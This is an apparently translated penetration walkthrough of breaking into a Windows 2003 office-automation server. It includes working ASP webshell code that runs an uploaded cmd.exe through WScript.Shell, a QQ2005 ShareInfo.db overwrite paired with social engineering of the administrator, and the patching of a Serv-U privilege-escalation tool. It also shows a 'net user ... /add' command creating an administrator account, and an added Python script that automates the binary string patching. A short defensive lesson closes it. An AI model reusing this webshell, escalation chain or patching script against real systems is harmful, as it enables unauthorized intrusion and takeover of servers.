Using a QQ file-sharing vulnerability to thoroughly breach a Windows 2003 "strong fortress" _ Vulnerability Research

Source: Internet
Author: User
Tags: file upload
Third-party software running on a server has long been regarded by attackers as a shortcut into the target system. Now the well-known Tencent QQ has joined that list of shortcuts. Fortunately, QQ is not a prerequisite for any server software, so I do not believe this will cause a wide-ranging crisis. The special circumstances described in this article are not common, but we should follow the principle of "guard against whatever is possible" and build the corresponding defenses.
First, the Webshell on Windows 2003
The target of this penetration was an OA (office automation) system server. Its operating system had recently been upgraded to Windows 2003, but the OA application still had an ASP file-upload vulnerability, so obtaining a Webshell was never in doubt.
The obstacle came with privilege escalation.
After logging into the Webshell I found that only the server's D: drive could be viewed; the C: drive was inaccessible, and the Webshell reported "no permission". This was expected: the Webshell only has Guests-group permissions, and Windows 2003 by default denies the anonymous "Everyone" user and members of the "Guests" group access to cmd.exe, which also means the Webshell cannot run commands through cmd.exe.
The only thing to be thankful for was that the Webshell could read and write the subdirectories of the D: drive (which holds the web virtual directory). Besides the web virtual directory there were some data backup files and a Tencent QQ installation directory, Tencent.
Second, cracking Serv-U's "ultimate defense"
Windows 2003's various default security settings showed their strength, and it looked unlikely that the existing permissions could be elevated any time soon, until I saw a glimmer of hope: sending an FTP connection request to the server from my own machine returned Serv-U's banner.
The article "Building a Windows 2003 bastion host" in issue 6 (2004) of "Line of Defense", mentioned earlier, asserted that because of Windows 2003's restrictions on cmd.exe, a Webshell has no way to run cmd.exe. Practice shows that this is not true: upload cmd.exe from a local non-2003 system through the Webshell into an executable directory, and the WScript.Shell component can then run that cmd.exe through the Webshell on Windows 2003 with the Webshell's own permissions. Combined with nc.exe, you can even obtain a command-line shell with Guests-group permissions.
To this end I made some improvements to Veteran Webmaster Assistant 6.0, adding the following code so that it can run a locally uploaded cmd.exe through the WScript.Shell component:
<%@ Language=VBScript %>
<object runat=server id=ws scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<!-- alternate CLSID for WScript.Shell listed in the original: F935DC22-1CF0-11D0-ADB9-00C04FD58A0B -->
<object runat=server id=fso scope=page classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></object>
<%
' Cmdshell(): run an uploaded cmd.exe from the webshell. Two routes:
'   1. WScript.Shell.Exec and read stdout directly (checkbox "WScript" ticked)
'   2. WScript.Shell.Run with output redirected to a temp file that is read back and deleted
Function Cmdshell()
    Dim shellpath, checked, defcmd, si, cm, dd, aaa, sztempfile, ofilelcx
    ' Remember the path of the uploaded cmd.exe across requests
    If Request("sp") <> "" Then Session("Shellpath") = Request("sp")
    shellpath = Session("Shellpath")
    If shellpath = "" Then shellpath = "cmd.exe"
    If Request("wscript") = "yes" Then
        checked = " checked"
    Else
        checked = ""
    End If
    defcmd = ""
    If Request("cmd") <> "" Then defcmd = Request("cmd")
    si = "<form method=post><input name=cmd style=""width:92%"" class=cmd value=""" & Server.HTMLEncode(defcmd) & """><input type=submit value=Run>"
    si = si & "<textarea style=""width:100%;height:500"" class=cmd>"
    If Request.Form("cmd") <> "" Then
        If Request.Form("wscript") = "yes" Then
            ' Route 1. The original webshell obtained the ProgID through its ObT(1,0)
            ' helper, which returns "WScript.Shell".
            Set cm = CreateObject("WScript.Shell")
            Set dd = cm.Exec(shellpath & " /c " & defcmd)
            aaa = dd.StdOut.ReadAll
            si = si & Server.HTMLEncode(aaa)
        Else
            ' Route 2, using the page-level ws and fso objects declared above
            sztempfile = Server.MapPath("cmd.txt")
            Call ws.Run(shellpath & " /c " & defcmd & " > " & sztempfile, 0, True)
            Set ofilelcx = fso.OpenTextFile(sztempfile, 1, False, 0)
            aaa = Server.HTMLEncode(ofilelcx.ReadAll)
            ofilelcx.Close
            Call fso.DeleteFile(sztempfile, True)
            si = si & aaa
        End If
    End If
    si = si & "</textarea>"
    si = si & "Shell path: <input name=sp value=""" & shellpath & """ style=""width:70%"">"
    si = si & "<input type=checkbox name=wscript value=yes" & checked & ">WScript.Shell</form>"
    Response.Write si
End Function

' Called from the webshell's menu in the original; call it directly when used stand-alone
Call Cmdshell()
%>
To use it, enter the path of the uploaded cmd.exe in "Shell path", tick the WScript option, and run some system commands that need little privilege, such as "net start" or "netstat -an". After running these two commands the Webshell echoed many services, including the Serv-U FTP server, and port 43958 appeared in the list of active ports. I naturally thought of the powerful Serv-U FTP server local privilege-escalation vulnerability. But when I actually ran the FTP local privilege-escalation tool through the system-command function, it returned a 530 error (Figure 1). Evidently the administrator or someone else had applied a patch or some security configuration to Serv-U.
To find out exactly which security configuration, I searched the Internet for relevant articles. One titled "The ultimate prevention of the Serv-U FTP Server local privilege-escalation vulnerability", by the expert Xiaolu, is very popular and has been widely reproduced. Judging from the error message, the so-called ultimate prevention had probably been applied: the default administrator account name or password embedded in ServUDaemon.exe had been modified. Of course this was only a guess; only by downloading the target server's ServUDaemon.exe and inspecting its actual configuration could it be confirmed. But Serv-U was installed on the C: drive, where access, including to the Program Files directory, was denied, so the privilege escalation was blocked once more.
Third, using the QQ2005 shared-file vulnerability to finish the privilege escalation
Browsing the D: drive again, I looked at the Tencent folder, something rarely seen on a server, and viewed WhatsNew.txt.
From it I learned that the QQ version was QQ2005 Beta1, and the creation times of several related files showed that the network administrator had recently logged into QQ on the server. Could QQ be used? After some thought I finally remembered an exploitable vulnerability in the file-sharing function of QQ2005.
The flaw was introduced with the new QQ2005 version. Its harm can be described as follows: by exploiting this vulnerability an attacker can browse and read arbitrary files on the user's system (such as the SAM file, data backup files and files holding sensitive information). Affected systems: all Windows operating systems with the QQ2005 New Year edition installed.
The concrete exploitation method is: first log in to your own QQ on your local machine, open the "QQ menu", select Tools -> Set share, designate C:\ (or any other partition worth reading) as a shared file directory, then close QQ and find the file ShareInfo.db under the QQ-number folder in the installation directory (as shown in Figure 3). Upload it to overwrite the file of the same name on the target server (for example D:\Tencent\QQ\654321\ShareInfo.db). When the network administrator next logs into QQ on the server, the C: drive will be shared with friends as the shared directory.
Because strangers cannot access shared files, a little social engineering is needed to get the administrator to add you as a friend (the more trustworthy the stated reason, the better). If the administrator accepts the request, the server's C: drive is shared under the QQ file-sharing directory, the ServUDaemon.exe that could not be reached through the Webshell can be downloaded, and the blocked escalation path can continue.
That night the administrator accepted the application and added me as a friend. Coral QQ showed the IP as the target server's IP, so I downloaded ServUDaemon.exe. Opening it in UltraEdit and searching for 127.0.0.1, I found that the built-in account name "LocalAdministrator" in the default configuration had been changed to "Localadministruser". This looks like a very "ultimate" defense. However, Xiaolu's proposed method was apparently not examined from the attacker's side before it was published: an attacker only needs to learn the modified configuration and adjust the local privilege-escalation tool accordingly, and the so-called ultimate defense is breached. The method: open the Serv-U local privilege-escalation tool in UltraEdit and change LocalAdministrator to Localadministruser.
Then I uploaded the modified Ftp2.exe and, through WScript.Shell, ran D:\web\ftp2.exe "net user user Password /add". Checking the result showed that a user had been added successfully. The user was then added to the Administrators group and the Remote Desktop Users group, and I logged on to the target server's desktop.
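The last two steps above, locating the renamed built-in account in ServUDaemon.exe and patching the matching string in the exploit tool, were done by hand in UltraEdit. As an added example (not from the original article, and not Serv-U's or the tool's own code), the following Python script does the same in a scriptable, checked way: it finds the printable strings that sit near the "127.0.0.1" marker in a binary, searches for a name in both ASCII and UTF-16LE (Windows binaries embed strings in both forms), and replaces a string in a second binary only when the replacement fits in the original's slot, NUL-padding shorter names and refusing longer ones, because changing the length of an embedded string would shift everything after it. The two byte blobs are constructed for the demonstration; real ServUDaemon.exe and exploit binaries are not laid out like this, and the 64-byte search window is an assumption.

```python
import re
from typing import Dict, List, Tuple

# Constructed stand-ins for ServUDaemon.exe and the exploit tool (not real file layouts).
SAMPLE_DAEMON = (
    b"\x00" * 16
    + b"127.0.0.1\x00" + b"\x00" * 4
    + b"Localadministruser\x00"          # the renamed account, stored as ASCII
    + b"\x00" * 8
    + "LocalAdministrator".encode("utf-16le") + b"\x00\x00"  # a UTF-16LE copy of the default
)
SAMPLE_TOOL = b"MZ" + b"\x00" * 30 + b"LocalAdministrator\x00" + b"\x00" * 8

DEFAULT_ACCOUNT = "LocalAdministrator"   # Serv-U's built-in local admin account name
LOCAL_MARKER = "127.0.0.1"               # the address the local admin connection goes to


def find_strings(data: bytes, needle: str) -> Dict[str, List[int]]:
    """Offsets of `needle` in the blob, both as ASCII and as UTF-16LE."""
    return {
        "ascii": [m.start() for m in re.finditer(re.escape(needle.encode("ascii")), data)],
        "utf-16le": [m.start() for m in re.finditer(re.escape(needle.encode("utf-16le")), data)],
    }


def printable_runs(data: bytes, min_len: int = 8) -> List[Tuple[int, str]]:
    """(offset, text) for each run of at least min_len printable ASCII bytes, like `strings`."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [(m.start(), m.group().decode("ascii")) for m in re.finditer(pattern, data)]


def account_candidates(data: bytes, window: int = 64) -> List[str]:
    """Printable strings that start within `window` bytes after a 127.0.0.1 marker.
    This automates the UltraEdit search described in the article; the window size is an assumption."""
    candidates = []
    for marker_off in find_strings(data, LOCAL_MARKER)["ascii"]:
        for s_off, text in printable_runs(data):
            if marker_off < s_off <= marker_off + window and text != LOCAL_MARKER:
                candidates.append(text)
    return candidates


def can_patch(old: str, new: str, encoding: str = "ascii") -> bool:
    """A replacement is safe only if it fits in the original string's slot."""
    return len(new.encode(encoding)) <= len(old.encode(encoding))


def patch_string(data: bytes, old: str, new: str, encoding: str = "ascii") -> bytes:
    """Replace every occurrence of `old` with `new` without changing the file length.
    Shorter replacements are NUL-padded (a whole number of code units, since both
    encodings here produce even-length UTF-16LE strings); longer ones are refused."""
    if not can_patch(old, new, encoding):
        raise ValueError("replacement is longer than the original: it would shift the binary")
    old_b = old.encode(encoding)
    new_b = new.encode(encoding).ljust(len(old_b), b"\x00")
    if old_b not in data:
        raise ValueError("original string not present in this encoding")
    patched = data.replace(old_b, new_b)
    assert len(patched) == len(data)
    return patched


if __name__ == "__main__":
    print("candidates near 127.0.0.1:", account_candidates(SAMPLE_DAEMON))
    print("default name offsets:", find_strings(SAMPLE_DAEMON, DEFAULT_ACCOUNT))
    tool = patch_string(SAMPLE_TOOL, DEFAULT_ACCOUNT, "Localadministruser")
    print("patched tool contains new name:", b"Localadministruser" in tool)
```

In the article's case the renamed account "Localadministruser" happens to be exactly as long as "LocalAdministrator", which is why a plain overwrite in UltraEdit worked; the length check above is what a practitioner wants when the new name is not the same size. The same search should be run for the UTF-16LE form as well, since a defender who only rewrote one encoding leaves the other as a tell.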
After many hazards, this sturdy Windows 2003 fortress was finally captured completely.
Fourth, a simple lesson
As can be seen, in line with the "fewer services, more security" principle, the fewer third-party programs a server runs, the safer it is. The well-known pcAnywhere, VNC and Serv-U privilege escalations, and the QQ2005 privilege escalation used here, can all be avoided.
